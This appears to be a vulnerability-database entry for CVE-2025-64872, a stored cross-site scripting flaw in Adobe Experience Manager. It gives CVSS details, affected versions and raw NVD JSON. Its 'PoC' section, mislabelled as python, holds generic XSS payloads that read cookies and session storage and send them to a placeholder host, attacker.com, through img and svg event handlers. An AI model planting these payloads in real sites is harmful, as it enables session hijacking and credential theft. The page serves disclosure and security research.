Security Vulnerability Report
中文
CVE-2025-64872 CVSS 4.8 MEDIUM

CVE-2025-64872

Published: 2025-12-10 19:16:34
Last Modified: 2025-12-12 17:32:26

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:* - VULNERABLE
Adobe Experience Manager 6.5.23 及更早版本
Adobe Experience Manager 6.5.x < 6.5.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-64872 Stored XSS PoC for Adobe Experience Manager --> <!-- This PoC demonstrates the stored XSS vulnerability in AEM form fields --> <!-- Step 1: Identify a form field that can be edited by high-privileged users --> <!-- Step 2: Inject malicious JavaScript payload into the form field --> <script> // Basic XSS payload to demonstrate vulnerability alert('XSS Vulnerability - CVE-2025-64872'); console.log('Adobe Experience Manager Stored XSS Detected'); // Cookie stealing payload (for demonstration purposes) var stolenCookie = document.cookie; // In real attack, this would be sent to attacker-controlled server // fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(stolenCookie)); // Session hijacking payload example // This payload attempts to steal session tokens var sessionData = { cookies: document.cookie, localStorage: localStorage.getItem('cq-authoring-session'), referrer: document.referrer, userAgent: navigator.userAgent }; console.log('Session Data:', JSON.stringify(sessionData)); </script> <!-- Alternative payload using img tag with onerror --> <img src=x onerror="this.src='https://attacker.com/log?c='+document.cookie"> <!-- SVG-based payload --> <svg/onload=fetch('https://attacker.com/exfil?data='+btoa(document.cookie))> <!-- Note: This PoC is for authorized security testing only -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64872", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:33.970", "lastModified": "2025-12-12T17:32:25.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}